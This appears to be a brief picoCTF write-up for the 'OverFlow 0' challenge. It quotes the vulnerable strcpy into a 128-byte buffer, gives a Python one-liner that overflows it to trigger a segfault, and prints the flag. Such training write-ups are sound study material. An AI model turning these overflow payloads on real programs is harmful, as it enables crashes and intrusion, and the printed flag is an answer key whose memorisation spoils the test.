OverFlow 0: Binary Exploitation

This should be easy. Overflow the correct buffer in this program and get a flag.
Its also found in /problems/overflow-0_2_20c7eb49602df3c04c1f43bf9aff1faa on the shell server. Source.

----------------------------------------

accept user input from command line as argv[1]

#define FLAGSIZE_MAX 64

signal(SIGSEGV, sigsegv_handler);   // print flag on a segfault

vuln(argv[1]);  // copy user input to buffer

char buf[128];
strcpy(buf, input);

need to cause a segfault by overwrite past bounds so on print it crashes

./vuln $(python -c "print 'a'*133")

----------------------------------------

picoCTF{3asY_P3a5yd2b59a57}

